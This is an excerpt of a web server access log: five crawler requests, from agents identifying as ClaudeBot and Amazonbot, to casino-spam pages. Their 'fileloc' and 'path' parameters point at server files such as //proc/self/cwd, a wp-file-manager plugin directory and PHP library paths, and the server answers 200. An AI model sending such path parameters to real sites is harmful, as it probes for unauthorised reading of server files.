216.73.216.11 - - [01/Nov/2025:08:47:12 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fpython%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fpython HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:10 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FIsbn.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3106 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:09 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FOptional.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:11 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FBlankValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2919 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.204.150.196 - - [01/Nov/2025:08:47:11 -0400] "GET /bathrooms/?path=//usr/share/locale/din HTTP/1.1" 200 3335 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
